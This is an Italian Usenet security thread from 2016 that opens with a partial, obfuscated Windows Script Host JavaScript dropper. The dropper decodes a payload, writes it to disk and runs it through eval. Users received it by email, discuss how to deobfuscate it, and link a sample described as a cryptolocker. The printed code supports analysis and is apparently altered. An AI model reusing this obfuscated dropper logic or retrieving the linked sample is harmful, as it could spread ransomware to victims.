Sq[949]=238;
Sq[8745]=239;
Sq[8801]=5345 - 5105;
Sq[177]=101 * 2 + 39;
Sq[8805]=-5465 + 5707;
Sq[8804]=243;
Sq[1522 + 7470]=244;
Sq[8993]=245;
Sq[247]=246;
Sq[8776]=247;
Sq[30 * 5 + 26]=3924 - 3676;
Sq[8729]=249;
Sq[183]=250;
Sq[8730]=251;
Sq[8319]=252;
Sq[-6592 + 6770]=253;
Sq[9632]=254;
Sq[160]=255;

var HFz=new Array();
for (var OPj=6938 - 6938; OPj < Tf0[JQu(QSc) + (function
Cn2(){return OXv9;}())]; OPj++) {
var EFq7=Tf0[Xu4 + IDg5(RVk) + Ir8](OPj);
if (EFq7 < (4 * 32))
{var ENo=EFq7;}
else
{var ENo=Sq[EFq7];}
HFz[(function Gk(){return RUn9;}()) + JVi](ENo);
};

return HFz;
};


function Ly(DHf1 /* k */)
{
var Pa7=new Array();

Pa7[128]=199;
Pa7[129'+''+']=252;
Pa7[130]=233;
Pa7[131]=226;
Pa7[132]=228;
Pa7[133]=224;
Pa7[134]=229;
Pa7[135]=231;
Pa7[136]=234;
Pa7[137]=235;
Pa7[138]=232;
Pa7[139]=239;
Pa7[140]=238;
Pa7[25 * 5 + 16]=236;
Pa7[142]=196;
Pa7[143]=197;
Pa7[2210 - 2066]=8219 - 8018;
Pa7[145]=230;
Pa7[7123 - 6977]=198;
Pa7[3078 - 2931]=244;
Pa7[148]=246;
Pa7[54 * 2 + 41]=-7451 + 7693;
Pa7[150]=251;
Pa7[151]=249;
Pa7[152]=255;
Pa7[73 * 2 + 7]=214;
Pa7[154]=220;
Pa7[-3787 + 3942]=162;
Pa7[857 - 701]=163;
Pa7[2435 - 2278]=7487 - 7322;
Pa7[-8338 + 8496]=1327 + 7032;
Pa7[159]=402;
Pa7[13 * 12 + 4]=225;
Pa7[161]=-7323 + 7560;
Pa7[162]=243;
Pa7[163]=250;
Pa7[164]=241;
Pa7[-7646 + 7811]=209;
Pa7[64 * 2 + 38]=1535 - 1365;
Pa7[167]=186;
Pa7[-307 + 475]=60 * 3 + 11;
Pa7[7758 - 7589]=945 * 9 + 471;
Pa7[170]=172;
Pa7[171]=189;
Pa7[172]=188;
Pa7[173]=15 * 10 + 11;
Pa7[-7814 + 7988]=171;
Pa7[175]=187;
Pa7[176]=17023 - 7406;
Pa7[177]=9618;
Pa7[178]=9619;
Pa7[179]=9474;
Pa7[8887 - 8707]=9508;
Pa7[18'+''+'1]=9569;
Pa7[182]=9570;
Pa7[183]=2474 * 3 + 2136;
Pa7[184]=9557;
Pa7[185]=17863 - 8292;
Pa7[186]=17177 - 7624;
Pa7[10143 - 9956]=3117 * 3 + 208;
Pa7[188]=9565;
Pa7[7026 - 6837]=9564;
Pa7[190]=9563;
Pa7[-6960 + 7151]=9488;
Pa7[192]=24 * 395 + 12;
Pa7[193]=9524;
Pa7[7489 - 7295]=11205 - 1689;
Pa7[195]=9172 + 328;
Pa7[196]=9472;
Pa7[197]=9532;
Pa7[198]=14788 - 5222;
Pa7[199]=3280 * 2 + 3007;
Pa7[200]=9562;
Pa7[-1245 + 1446]=9556;
Pa7[-6094 + 6296]=9577;
Pa7[4501 - 4298]=9574;
Pa7[-8356 + 8560]=16041 - 6473;
Pa7[205]=9552;
Pa7[206]=18878 - 9298;
Pa7[207]=9575;
Pa7[208]=9576;
Pa7[209]=16184 - 6612;
Pa7[29 * 7 + 7]=3391 + 6182;
Pa7[211]=9561;
Pa7[212]=12923 - 3363;
Pa7[213]=9554;
Pa7[214]=9555;
Pa7[215]=9579;
Pa7[4281 - 4065]=9578;
Pa7[217]=9496;
Pa7[78 * 2 + 62]=9484;
Pa7[219]=19023 - 9415;
Pa7[220]=9604;
Pa7[5 * 44 + 1]=9612;
Pa7[222]=9616;
Pa7[223]=2260 * 4 + 560;
Pa7[224]=945;
Pa7[225]=6228 - 6005;
Pa7[-4150 + 4376]=915;
Pa7[-3111 + 3338]=960;
Pa'+''+'7[28 * 8 + 4]=931;
Pa7[229]=-7943 + 8906;
Pa7[230]=181;
Pa7[-6447 + 6678]=964;
Pa7[-2571 + 2803]=934;
Pa7[233]=396 * 2 + 128;
Pa7[234]=937;
Pa7[235]=281 * 3 + 105;
Pa7[236]=8734;
Pa7[237]=25 * 38 + 16;
Pa7[238]=949;
Pa7[239]=8745;
Pa7[240]=-293 + 9094;
Pa7[89 * 2 + 63]=177;
Pa7[242]=8805;
Pa7[90 * 2 + 63]=8804;
Pa7[244]=8992;
Pa7[-2514 + 2759]=2543 * 3 + 1364;
Pa7[246]=247;
Pa7[247]=8776;
Pa7[36 * 6 + 32]=2 * 88;
Pa7[249]=8729;
Pa7[55 * 4 + 30]=183;
Pa7[251]=16189 - 7459;
Pa7[252]=8319;
Pa7[253]=178;
Pa7[254]=19363 - 9731;
Pa7[255]=160;

var Dq=new Array();
var Og="";
var ENo; var EFq7;
for (var OPj=1 * 0; OPj < DHf1[QSc + OXv9]; OPj++)
{
ENo=DHf1[OPj];
if (ENo < 128)
{EFq7=ENo;}
else
{EFq7=Pa7[ENo];}
Dq.push(String[Kt + Fd + XUw + Eo6](EFq7));
}

Og=Dq[RFj]("");

return Og;
};


function Vg8(Ec, DHf1 /* k */)
{
var WHy0=WScript[RJe4 + LFp + As3 + Up(Zu)](TYj+Cc0+Vw3(Wt6)+XOs +
Yv + Xf); WHy0[LOe3]=DAe;
'+''+' WHy0[Sm2 + Uq]=UMc /* k */;
WHy0[IDg]();
WHy0[Uf9 + RFl + (function In(){return LUg;}())](Ly(DHf1 /* k */));
WHy0[Hs2 + Sa0 + ETx9 + ZZc8](Ec, 2);

WHy0[KCh5 + TZa + RVy]();
};';

// Execution stage: the statement above only assembles the string aMSq4; its
// hex escapes (\x..) and '+''+' splits break up recognisable keywords,
// presumably to get past simple text matching. This eval is the point where
// that string is run as script code by the script host.
// For analysis, read the decoded string as text instead of evaluating it.
// NOTE(review): the copy on this page looks altered by the archive (masked
// characters inside the string), so it may not parse as shown; compare it
// with the original attachment before drawing conclusions.
eval(aMSq4);
// The evaluated text calls WScript.Quit(0) itself, so this exit with code 1 is
// presumably reached only if that code returns without quitting.
WScript.Quit(1);
Alex 4 Ago 2016 12:01
Skywalker Senior scriveva il 03/08/2016 :
> Sembra che Alex abbia detto :
>> Allego un probabile virus che è arrivato in formato compresso .zip
>>
>> Si tratta di un javascript.
>>
>> ATTENZIONE: LEGGETELO SOLO CON UN EDITOR DI TESTO, tipo notepad.
>>
>> Sembra qualcosa che sfrutta le vulnerabilità di Explorer.
>>
>> Io non riesco a capire con chi vorrebbe comunicare questo presunto virus.
>>
>> Bye
>> Alex
>>
>> ------------
>> VIRUS - LEGGERE SOLO CON NOTEPAD
>>
>
> Appena ho aperto il messaggio, Defender si è allarmato, nonostante sia solo
> testo!

Forse facevo meglio a lasciarlo codificato base64, come è arrivato. :-)
Bye
Alex

--
Alex

--- news://freenews.netfront.net/ - complaints: news@netfront.net ---
Alex 4 Ago 2016 12:06
Arne Saknussemm ha spiegato il 04/08/2016 :
>
> quella sotto è la versione parzialmente "deoffuscata" nel caso a
> qualcuno interessi; non credo si tratti di una vuln di IE quanto dello
> sfruttamento del motore di scripting di windows, dato che la prima cosa
> che lo script fa è caricare il codice in una variabile e subito dopo
> eseguirlo usando la "eval" posta in fondo allo script, per quanto poi
> riguarda il "cosa faccia", al momento non ho tempo per giocarci, ma se
> qualcuno volesse torturarlo ...
>

Chi scrive virus detesta che altri ne leggano il codice, evidentemente,
quindi lo aggroviglia più che gli è possibile.
A parte la competenza tecnica, ci vuole anche la pazienza di Giobbe per
decrittarlo.

Bye
Alex

--
Alex

--- news://freenews.netfront.net/ - complaints: news@netfront.net ---
John Doez 4 Ago 2016 15:05
On Tue, 02 Aug 2016 19:12:22 +0200, Alex wrote:

>
>Si tratta di un javascript.

Io ho associato tutte quelle *****herie al notepad.
Non c'è motivo per cui un .js debba essere lanciato dall'utente.
ObiWan 4 Ago 2016 15:40
:: On Tue, 02 Aug 2016 19:12:22 +0200
:: (it.comp.sicurezza.virus)
:: <nnqk9p$1k4l$1@adenine.netfront.net>
:: Alex <tommaso5ita@yahoo.it> wrote:

> VIRUS - LEGGERE SOLO CON NOTEPAD
>
>
> var aMSq4 = 'if
> (WScript.Path[\x22cha\x72At\x22](\x57Script.\x50ath.\x6cength-1)

potresti caricare l'originale qui

http://pastebin.com/

e postare l'URL ? Mica per altro ma vorrei dargli un'occhiatina
P/ero 8 Ago 2016 16:56
"ObiWan" [by "newsreader: Not Found"] on 04/08/16 15:40:31 (Italian Time) wrote:

> :: On Tue, 02 Aug 2016 19:12:22 +0200
> :: (it.comp.sicurezza.virus)
> :: <nnqk9p$1k4l$1@adenine.netfront.net>
> :: Alex <tommaso5ita@yahoo.it> wrote:

..._skipped!_
> potresti caricare l'originale qui

> http://pastebin.com/

> e postare l'URL ? Mica per altro ma vorrei dargli un'occhiatina

Guarda questo, è un cryptolocker:
http://wikisend.com ******* 166190/invoice_PwrYhB.txt

--
* b *
* y *
* Piero *
#v+
Se perdi la calma, non la ritrovi fra gli "Oggetti smarriti".
#v-
